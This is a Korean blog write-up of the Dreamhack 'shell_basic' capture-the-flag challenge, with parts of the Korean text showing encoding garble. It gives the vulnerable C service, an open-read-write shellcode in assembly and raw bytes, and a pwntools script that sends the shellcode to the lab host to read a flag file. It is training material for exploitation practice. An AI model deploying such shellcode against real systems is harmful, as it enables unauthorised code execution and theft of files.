
[Dreamhack] Level2: shell_basic

by Yun2๐Ÿ‘ 2023. 8. 22.
๋ฐ˜์‘ํ˜•

๐Ÿ›Ž๏ธAccess

입력한 셸코드를 실행하는 프로그램이 서비스로 등록되어 작동하고 있습니다.
main 함수가 아닌 다른 함수들은 execve, execveat 시스템 콜을 사용하지 못하며, 풀이와 관련이 없습니다.
flag ํŒŒ์ผ์˜ ์œ„์น˜์™€ ์ด๋ฆ„์€ /home/shell_basic/flag_name_is_loooooong์ž…๋‹ˆ๋‹ค.

 

 

👾 Exploit Algorithm & Payload

// Compile: gcc -o shell_basic shell_basic.c -lseccomp
// apt install seccomp libseccomp-dev

#include <fcntl.h>
#include <seccomp.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/prctl.h>
#include <unistd.h>
#include <sys/mman.h>
#include <signal.h>

/* SIGALRM handler installed by init(): report the timeout on stdout and
 * terminate the whole process with status -1 (255). Never returns. */
void alarm_handler() {
    fputs("TIME OUT\n", stdout);
    exit(-1);
}

/* Service setup: make stdin/stdout unbuffered so the prompt and the client's
 * input are not held back by stdio, then arm a 10-second watchdog that is
 * delivered as SIGALRM and handled by alarm_handler(). */
void init() {
    FILE *streams[] = { stdin, stdout };
    for (size_t i = 0; i < sizeof streams / sizeof streams[0]; i++)
        setvbuf(streams[i], NULL, _IONBF, 0);

    signal(SIGALRM, alarm_handler);
    alarm(10);                       /* seconds until SIGALRM */
}

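/* Install the challenge's seccomp sandbox: the default action is ALLOW, and
 * execve/execveat are answered with SCMP_ACT_KILL, so orw-style shellcode
 * still works while spawning a shell does not.
 *
 * Fail closed: the original ignored the return values of seccomp_rule_add()
 * and seccomp_load(), so a failure there would have left the process running
 * with no filter at all. Every libseccomp call returns 0 on success and a
 * negative errno value on failure; any failure ends the process (status 0,
 * matching the existing seccomp_init() failure path).
 * The filter context is not released after loading, as in the original;
 * seccomp_release(ctx) would free it once the filter is in the kernel. */
void banned_execve() {
  scmp_filter_ctx ctx;
  ctx = seccomp_init(SCMP_ACT_ALLOW);
  if (ctx == NULL) {
    exit(0);
  }
  if (seccomp_rule_add(ctx, SCMP_ACT_KILL, SCMP_SYS(execve), 0) < 0 ||
      seccomp_rule_add(ctx, SCMP_ACT_KILL, SCMP_SYS(execveat), 0) < 0) {
    exit(0);                         /* rule could not be added: do not run unsandboxed */
  }

  if (seccomp_load(ctx) < 0) {
    exit(0);                         /* filter not active: do not run unsandboxed */
  }
}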

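/* Challenge entry point: map one RWX page, read up to 0x1000 bytes of
 * client-supplied code into it and jump to it. Executing untrusted input is
 * the deliberate premise of this challenge; the only protections are the
 * seccomp filter from banned_execve() and the 10-second alarm from init().
 *
 * Changes against the original: mmap() failure (MAP_FAILED, not NULL) and a
 * failed/empty read() are now detected instead of being dereferenced or
 * executed as zero-filled memory. The read length equals the mapping size,
 * so the read cannot overrun the page. The non-standard `void main`
 * signature is kept unchanged. argc/argv are unused. */
void main(int argc, char *argv[]) {
  (void)argc;
  (void)argv;

  char *shellcode = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC,
                         MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
  void (*sc)();
  ssize_t n;

  if (shellcode == MAP_FAILED) {     /* mmap reports errors as MAP_FAILED */
    perror("mmap");
    exit(1);
  }

  init();

  banned_execve();

  printf("shellcode: ");
  n = read(0, shellcode, 0x1000);    /* at most one page: matches the mapping size */
  if (n <= 0) {
    puts("no shellcode");            /* EOF or read error: nothing to execute */
    exit(1);
  }

  sc = (void *)shellcode;
  sc();
}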

 

 

#1


#include<stdio.h>
#include<stdlib.h>
#include<fcntl.h>
#include<unistd.h>

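/* Reference C version of the open-read-write sequence the shellcode has to
 * reproduce: open the flag file read-only, read up to 0x30 bytes and echo
 * exactly the bytes read to stdout.
 *
 * Fixes against the original: `RD_ONLY` is not a <fcntl.h> name and does not
 * compile (the flag is O_RDONLY); open()/read() results are checked; only the
 * bytes actually read are written instead of the whole 0x30-byte buffer
 * (which would print uninitialised stack bytes when the flag is shorter);
 * the descriptor is closed and main returns a status. */
int main(void){
    int fd;
    char buf[0x30];
    ssize_t n;

    fd = open("/home/shell_basic/flag_name_is_loooooong", O_RDONLY);
    if (fd < 0) {
        perror("open");
        return 1;
    }

    n = read(fd, buf, sizeof buf);   /* sizeof buf == 0x30 */
    if (n < 0) {
        perror("read");
        close(fd);
        return 1;
    }

    write(1, buf, (size_t)n);        /* write only what was read */
    close(fd);
    return 0;
}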

: execve 시스템 콜을 사용하지 못한다는 문제를 보고 orw 쉘 코드를 작성해서 '/home/shell_basic/flag_name_is_loooooong' 경로에 있는 flag 파일을 열람하는 문제임을 짐작했다.

: orw(Open-Read-Write) 쉘 코드를 작성하기 전에 C 언어로 나타낸 동작은 다음과 같다.

 

 

#2


: 동작 확인 후 스켈레톤 코드로 orw 코드의 뼈대를 작성하였다.


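/* orw shellcode as a GAS inline-asm function `run_sh` (Intel syntax, Linux
 * x86-64 syscall convention: rax = number, rdi/rsi/rdx = arguments).
 *
 * The path "/home/shell_basic/flag_name_is_loooooong" is built on the stack
 * from five little-endian qwords plus a NUL qword, so after the pushes rsp
 * points at the C string. The 0x30-byte read buffer sits just below rsp;
 * nothing else touches the stack before exit, so that area is safe to use.
 * Never returns: it always ends in exit(0).
 *
 * Fixes against the original: the block now switches the assembler to Intel
 * syntax itself (gcc's default is AT&T, where `xor rax, rax` does not
 * assemble) and restores AT&T at the end — drop both directives if you build
 * with -masm=intel; a failed open() (rax = -errno) jumps straight to exit;
 * write() uses the byte count returned by read() instead of a fixed 0x30. */
__asm__(
".intel_syntax noprefix\n"
".global run_sh\n"
"run_sh:\n"

"xor rax, rax\n"
"push rax #NUL terminator\n"
"mov rax, 0x676e6f6f6f6f6f6f #'oooooong'\n"
"push rax\n"
"mov rax, 0x6c5f73695f656d61  #'ame_is_l'\n"
"push rax\n"
"mov rax, 0x6e5f67616c662f63 #'c/flag_n'\n"
"push rax\n"
"mov rax, 0x697361625f6c6c65 #'ell_basi'\n"
"push rax\n"
"mov rax, 0x68732f656d6f682f #'/home/sh'\n"
"push rax\n"
"mov rdi, rsp #rdi = '/home/shell_basic/flag_name_is_loooooong'\n"
"xor rsi, rsi #flags = O_RDONLY (0)\n"
"xor rdx, rdx #mode = 0\n"
"mov rax, 0x02 #SYS_open\n"
"syscall #rax = open(path, O_RDONLY, 0), or -errno\n"
"test rax, rax\n"
"js .Lexit #open failed: nothing to read\n"
"\n"

"mov rdi, rax       #fd\n"
"lea rsi, [rsp-0x30] #buf = rsp-0x30\n"
"mov rdx, 0x30      #count = 0x30\n"
"xor rax, rax       #SYS_read\n"
"syscall            #rax = read(fd, buf, 0x30)\n"
"\n"

"mov rdx, rax       #count = bytes actually read\n"
"mov rdi, 1         #fd = stdout\n"
"mov rax, 0x1       #SYS_write\n"
"syscall            #write(1, buf, rdx)\n"
"\n"

".Lexit:\n"
"xor rdi, rdi       #status = 0\n"
"mov rax, 0x3c      #SYS_exit\n"
"syscall            #exit(0)\n"
".att_syntax prefix\n"
);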

 

/* run_sh is defined in the top-level __asm__ block above; it never returns. */
void run_sh();

/* Hand control to the shellcode function. Unreachable after the call. */
int main(void)
{
    run_sh();
    return 0;
}

 


; File name: exploit.asm

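section .text
global _start

;-----------------------------------------------------------------------
; _start: open-read-write shellcode for /home/shell_basic/flag_name_is_loooooong
; ABI:   Linux x86-64 raw syscall convention (rax = nr; rdi, rsi, rdx = args;
;        rax returns the result or -errno)
; Stack: the path is built from five little-endian qwords plus a NUL qword,
;        so rsp points at the C string; the 0x30-byte read buffer sits just
;        below rsp (nothing else uses the stack before exit).
; Exit:  always terminates via exit(0). Changes against the original: a
;        failed open() jumps straight to exit, and write() uses the byte count
;        returned by read() instead of a fixed 0x30 (so no stack bytes beyond
;        the flag are printed).
;-----------------------------------------------------------------------
_start:
;open
        xor     rax, rax
        push    rax                             ; NUL terminator
        mov     rax, 0x676e6f6f6f6f6f6f         ; "oooooong"
        push    rax
        mov     rax, 0x6c5f73695f656d61         ; "ame_is_l"
        push    rax
        mov     rax, 0x6e5f67616c662f63         ; "c/flag_n"
        push    rax
        mov     rax, 0x697361625f6c6c65         ; "ell_basi"
        push    rax
        mov     rax, 0x68732f656d6f682f         ; "/home/sh"
        push    rax
        mov     rdi, rsp                        ; rdi = "/home/shell_basic/flag_name_is_loooooong"
        xor     rsi, rsi                        ; flags = O_RDONLY (0)
        xor     rdx, rdx                        ; mode = 0
        mov     rax, 0x02                       ; SYS_open
        syscall                                 ; rax = fd, or -errno
        test    rax, rax
        js      .exit                           ; open failed: nothing to read

;read
        mov     rdi, rax                        ; fd
        lea     rsi, [rsp - 0x30]               ; buf = rsp - 0x30
        mov     rdx, 0x30                       ; count = 0x30
        xor     rax, rax                        ; SYS_read
        syscall                                 ; rax = bytes read

;write
        mov     rdx, rax                        ; count = bytes actually read
        mov     rdi, 0x01                       ; fd = stdout
        mov     rax, 0x01                       ; SYS_write
        syscall                                 ; write(1, buf, rdx)

;exit
.exit:
        xor     rdi, rdi                        ; status = 0
        mov     rax, 0x3c                       ; SYS_exit
        syscall                                 ; exit(0)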

 

: orw 코드는 다음과 같이 작성했다.

: '/home/shell_basic/flag_name_is_loooooong' 문자열을 ASCII -> 16진수(리틀 엔디언 방식)로 변환하여 stack에 넣어주었다.

※ stack push 내부 순서 → /home/sh ell_basi c/flag_n ame_is_l oooooong \x00

※ stack pop 내부 순서 → /home/sh ell_basi c/flag_n ame_is_l oooooong \x00

: open 함수를 syscall을 통해 호출한다.
: read 함수로 0x30만큼 읽어 지역변수 buf에 저장한다.
: write 함수를 syscall을 통해 호출한다.
: 마지막으로 프로그램을 종료시킬 exit 함수를 사용한다.

 

 

#3


# assemble the 64-bit ELF object from the NASM source
$ nasm -f elf64 exploit.asm
# optional: disassemble the object to check the encoding
$ objdump -d exploit.o
# dump the raw .text bytes (the shellcode itself) into exploit.bin
$ objcopy --dump-section .text=exploit.bin exploit.o

: asm 파일을 .o 파일로 어셈블(컴파일)하기 위해 nasm 명령어를 사용했다.

: objcopy 명령을 사용하여 objdump로 확인한 .text 섹션을 byte code(opcode) 형태로 추출했다.

: 추출 후 셸 코드를 서버로 보내 FLAG를 획득할 수 있다.

 

🔑 Analysis and results for obtaining the Flag DH{…}



from pwn import *

# Connection target for the shell_basic service (host/port as given on the page).
HOST, PORT = "host3.dreamhack.games", 17047

# Raw orw shellcode: the dumped .text of the assembled exploit.asm
# (open flag -> read 0x30 bytes -> write to stdout -> exit).
# Regenerate these bytes with nasm/objcopy whenever the listing changes.
shellcode = b"\x48\x31\xc0\x50\x48\xb8\x6f\x6f\x6f\x6f\x6f\x6f\x6e\x67\x50\x48\xb8\x61\x6d\x65\x5f\x69\x73\x5f\x6c\x50\x48\xb8\x63\x2f\x66\x6c\x61\x67\x5f\x6e\x50\x48\xb8\x65\x6c\x6c\x5f\x62\x61\x73\x69\x50\x48\xb8\x2f\x68\x6f\x6d\x65\x2f\x73\x68\x50\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\xb8\x02\x00\x00\x00\x0f\x05\x48\x89\xc7\x48\x89\xe6\x48\x83\xee\x30\xba\x30\x00\x00\x00\xb8\x00\x00\x00\x00\x0f\x05\xbf\x01\x00\x00\x00\xb8\x01\x00\x00\x00\x0f\x05\x48\x31\xff\xb8\x3c\x00\x00\x00\x0f\x05"

io = remote(HOST, PORT)
# The service prints "shellcode: " and then read()s up to 0x1000 bytes;
# wait for the prompt's ": " before sending.
io.sendafter(b": ", shellcode)
io.interactive()

+ 추가로 python 모듈 pwntools로도 FLAG를 획득할 수 있다.

 

 

📌 Summary


๊ณต๊ฒฉ์ž๊ฐ€ ์‰˜ ์ฝ”๋“œ๋ฅผ ์ด์šฉํ•˜๋ฉด ํ•ด๋‹น๋˜๋Š” ์ฝ”๋“œ๋Š” ์ •์ƒ์ ์ธ ๋™์ž‘์„ ํ•˜์ง€ ์•Š์„ ์ˆ˜ ์žˆ์Œ

ํ•ด๋‹น ์ฝ”๋“œ์˜ rip์ด ๊ณต๊ฒฉ์ž๊ฐ€ ์ž‘์„ฑ๋œ ์…€ ์ฝ”๋“œ๋กœ ์ด๋™๋˜์–ด ์˜๋„๋œ ์—„์…ˆ๋ธ”๋ฆฌ ์ฝ”๋“œ๊ฐ€ ์‹คํ–‰๋  ์ˆ˜ ์žˆ์Œ

또한 어셈블리어는 기계어와 거의 일대일로 대응되므로 원하는 모든 명령을 CPU에 내릴 수 있게 됨

 

mmap 사용: 코드에서 mmap을 사용하여 쉘코드를 할당하고 해당 메모리를 실행 가능한 메모리로 설정
쉘코드가 실행되도록 하는 방법이며, 악용될 경우 보안에 취약할 수 있음

seccomp 설정: banned_execve() 함수에서 libseccomp을 사용하여 execve 및 execveat 시스템 콜을 차단
그러나 이것만으로는 모든 공격을 완벽하게 막을 수 없음

๋ฒ„ํผ ์˜ค๋ฒ„ํ”Œ๋กœ์šฐ ๊ฐ€๋Šฅ์„ฑ: read(0, shellcode, 0x1000);์—์„œ ์‚ฌ์šฉ์ž ์ž…๋ ฅ์ด ๋ฉ”๋ชจ๋ฆฌ ํ• ๋‹น ํฌ๊ธฐ๋ฅผ ์ดˆ๊ณผํ•  ๊ฒฝ์šฐ ๋ฒ„ํผ ์˜ค๋ฒ„ํ”Œ๋กœ์šฐ๊ฐ€ ๋ฐœ์ƒํ•  ์ˆ˜ ์žˆ์Œ

...

 

๋”ฐ๋ผ์„œ ์ •์  ๋ถ„์„ ๋ฐ ์ฝ”๋“œ ๊ฒ€ํ† ๋ฅผ ์ฒ ์ €ํžˆ ์ˆ˜ํ–‰ํ•˜๊ณ , ๋ฐฐํฌ ์ „์— ์ทจ์•ฝ์ ์„ ์‹๋ณ„ํ•  ์ˆ˜ ์žˆ๋„๋ก ํ•ด์•ผํ•˜๋ฉฐ ๊ฐ๋ณ„ํžˆ ์—ฌ๋Ÿฌ ๋ถ€๋ถ„์—์„œ ์ฃผ์˜ํ•ด์•ผ ํ•จ

 

 

๋ฐ˜์‘ํ˜•

'[Dreamhack]SystemHacking > ๋กœ๋“œ๋งต_Basic' ์นดํ…Œ๊ณ ๋ฆฌ์˜ ๋‹ค๋ฅธ ๊ธ€

[Dreamhack] Level1: Return to Shellcode  (0) 2023.08.30
[Dreamhack] Level1: basic_exploitation_001  (0) 2023.08.28
[Dreamhack] Level2: basic_exploitation_000  (0) 2023.08.25
[Dreamhack] Level1: Return Address Overwrite  (0) 2023.08.18